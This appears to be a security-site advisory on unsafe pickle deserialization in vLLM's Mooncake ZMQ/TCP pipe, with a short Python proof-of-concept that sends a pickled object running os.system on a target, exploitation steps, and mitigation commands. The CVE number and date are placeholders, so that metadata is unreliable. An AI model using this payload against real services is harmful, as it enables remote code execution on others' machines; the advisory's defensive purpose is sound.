vLLM, Remote Code Execution, CVE-2023-XXXX (Critical)

By /

How the CVE Works:

The vulnerability arises in vLLM when configured with Mooncake, where unsafe deserialization of data occurs over ZMQ/TCP on all network interfaces. The `recv_tensor()` function calls _recv_impl, which directly passes raw network bytes to pickle.loads(). This deserialization process is inherently unsafe as it allows arbitrary code execution during the loading of serialized objects. Since the Mooncake pipe is exposed over the network using ZMQ over TCP, and it listens on all interfaces, attackers can send malicious payloads to the service. The lack of network controls or authentication mechanisms further exacerbates the issue, enabling remote attackers to exploit this vulnerability and execute arbitrary code on distributed hosts.

DailyCVE Form:

Platform: vLLM
Version: Pre-vllm-project/vllm14228
Vulnerability: Unsafe Deserialization
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

1. Exploit Code:

import pickle
import zmq
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://<target_ip>:<port>")
class Exploit:
def <strong>reduce</strong>(self):
import os
return (os.system, ('<malicious_command>',))
payload = pickle.dumps(Exploit())
socket.send(payload)

2. Steps to Exploit:

  • Identify the target vLLM service using Mooncake.
  • Craft a malicious payload using pickle.dumps().
  • Send the payload over ZMQ/TCP to the exposed service.
  • The payload will be deserialized, executing the embedded command.

Protection:

1. Patch: Apply the fix from `vllm-project/vllm14228`.

  1. Network Controls: Restrict ZMQ/TCP to trusted networks using firewalls.

3. Authentication: Implement authentication mechanisms for ZMQ connections.

  1. Code Fix: Replace `pickle.loads()` with a safer deserialization method. 
    import json
def safe_deserialize(data):
return json.loads(data)
  2. Monitoring: Monitor network traffic for unusual ZMQ/TCP activity.

6. Logging: Enable detailed logging for deserialization operations.

Commands:

  • Check Open Ports: 
    netstat -tuln | grep <port>
  • Block Unauthorized Access: 
    iptables -A INPUT -p tcp --dport <port> -j DROP
  • Update vLLM: 
    pip install --upgrade vllm

Analytics:

  • Affected Systems: Distributed vLLM deployments using Mooncake.
  • Risk Level: Critical due to remote code execution.
  • Attack Surface: Exposed ZMQ/TCP interfaces.
  • Mitigation Difficulty: Medium (requires patching and network reconfiguration).
    By following these steps, organizations can mitigate the risk posed by this critical vulnerability.

References:

Reported By: https://github.com/advisories/GHSA-x3m8-f7g5-qhm7
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top